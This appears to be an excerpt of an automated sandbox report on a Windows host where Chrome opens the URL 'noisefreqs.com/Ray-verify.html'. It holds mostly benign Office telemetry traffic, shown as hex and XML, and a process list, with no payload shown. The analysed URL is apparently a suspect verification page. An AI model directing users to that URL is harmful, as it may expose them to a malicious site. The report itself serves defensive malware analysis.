              2024-11-29 23:41:30 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:30 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:30 GMT
              Content-Type: text/xml
              Content-Length: 416
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
              ETag: "0x8DC582BAEA4B445"
              x-ms-request-id: 6da3e3c6-601e-0084-52b4-426b3f000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234130Z-174f7845968vqt9xhC1EWRgten00000010s0000000003arb
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:30 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


              Session IDSource IPSource PortDestination IPDestination Port
              52192.168.2.44981413.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:32 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:32 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:32 GMT
              Content-Type: text/xml
              Content-Length: 479
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
              ETag: "0x8DC582B989EE75B"
              x-ms-request-id: 83b34a83-b01e-0053-35ab-42cdf8000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234132Z-174f7845968xlwnmhC1EWR0sv800000010c000000000gpck
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:32 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


              Session IDSource IPSource PortDestination IPDestination Port
              53192.168.2.44981613.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:32 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:32 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:32 GMT
              Content-Type: text/xml
              Content-Length: 471
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
              ETag: "0x8DC582B97E6FCDD"
              x-ms-request-id: dcf51672-d01e-005a-5c91-3f7fd9000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234132Z-174f78459685m244hC1EWRgp2c00000010h00000000040fs
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:32 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


              Session IDSource IPSource PortDestination IPDestination Port
              54192.168.2.44981513.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:32 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:32 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:32 GMT
              Content-Type: text/xml
              Content-Length: 415
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
              ETag: "0x8DC582BA80D96A1"
              x-ms-request-id: 261fcd2e-101e-005a-5345-40882b000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234132Z-174f78459685m244hC1EWRgp2c00000010k0000000001czn
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:32 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


              Session IDSource IPSource PortDestination IPDestination Port
              55192.168.2.44981813.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:32 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:32 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:32 GMT
              Content-Type: text/xml
              Content-Length: 477
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
              ETag: "0x8DC582BA54DCC28"
              x-ms-request-id: 7af319f3-d01e-0017-6a91-3fb035000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234132Z-174f7845968ljs8phC1EWRe6en00000010dg00000000dy5g
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:32 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


              Session IDSource IPSource PortDestination IPDestination Port
              56192.168.2.44981713.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:32 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:32 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:32 GMT
              Content-Type: text/xml
              Content-Length: 419
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
              ETag: "0x8DC582B9C710B28"
              x-ms-request-id: 5cf18767-601e-000d-7d91-3f2618000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234132Z-174f7845968kvnqxhC1EWRmf3g0000000mc000000000e2pp
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:32 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


              Session IDSource IPSource PortDestination IPDestination Port
              57192.168.2.44982113.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:34 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:34 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:34 GMT
              Content-Type: text/xml
              Content-Length: 419
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
              ETag: "0x8DC582B9FF95F80"
              x-ms-request-id: 91facc7f-401e-0064-1f3e-4054af000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234134Z-174f7845968cpnpfhC1EWR3afc000000106000000000eswf
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:34 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


              Session IDSource IPSource PortDestination IPDestination Port
              58192.168.2.44982013.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:34 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:34 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:34 GMT
              Content-Type: text/xml
              Content-Length: 477
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
              ETag: "0x8DC582BA48B5BDD"
              x-ms-request-id: f73eacfc-701e-0001-0b91-3fb110000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234134Z-174f7845968jrjrxhC1EWRmmrs00000010qg00000000e0ua
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:34 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


              Session IDSource IPSource PortDestination IPDestination Port
              59192.168.2.44981913.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:34 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:34 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:34 GMT
              Content-Type: text/xml
              Content-Length: 419
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
              ETag: "0x8DC582BB7F164C3"
              x-ms-request-id: 926e5261-401e-008c-1d9e-4286c2000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234134Z-174f784596886s2bhC1EWR743w00000010rg00000000496m
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:34 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


              Session IDSource IPSource PortDestination IPDestination Port
              60192.168.2.44982213.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:34 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net


              Session IDSource IPSource PortDestination IPDestination Port
              61192.168.2.44982313.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:34 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net


              020406080s020406080100

              Click to jump to process

              020406080s0.0050100MB

              Click to jump to process

              Target ID:0
              Start time:18:40:05
              Start date:29/11/2024
              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Imagebase:0x7ff76e190000
              File size:3'242'272 bytes
              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:false

              Target ID:2
              Start time:18:40:08
              Start date:29/11/2024
              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 --field-trial-handle=2260,i,4040764079350248205,16213322567652078909,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Imagebase:0x7ff76e190000
              File size:3'242'272 bytes
              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:false

              Target ID:3
              Start time:18:40:15
              Start date:29/11/2024
              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://noisefreqs.com/Ray-verify.html"
              Imagebase:0x7ff76e190000
              File size:3'242'272 bytes
              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true
              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

              No disassembly